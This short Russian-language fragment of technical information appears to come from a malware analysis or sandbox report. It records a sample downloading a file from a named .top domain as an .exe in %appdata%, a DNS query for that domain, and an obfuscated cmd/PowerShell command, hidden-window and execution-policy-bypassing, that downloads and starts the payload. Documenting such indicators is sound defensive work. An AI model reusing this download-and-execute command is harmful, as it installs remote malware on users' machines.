Техническая информация
- http://semiconductry.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwersHELL.exE -ExECutIOnpOLicY BypASs -noPrOfIlE -wiNdowsTYlE HiddeN (NEW-OBjeCt sYstem.NeT.WeBclient).DOWNloAdFIlE('http://semiconductry.top/search.php','%APpDAta%.EXe');StAr...
- DNS ASK se####nductry.top
- '<SYSTEM32>\cmd.exe' /c "pOwersHELL.exE -ExECutIOnpOLicY BypASs -noPrOfIlE -wiNdowsTYlE HiddeN (NEW-OBjeCt sYstem.NeT.WeBclient).DOWNloAdFIlE('http://semiconductry.top/search.php','%APpDAta%.EXe');StAr...' (со скрытым окном)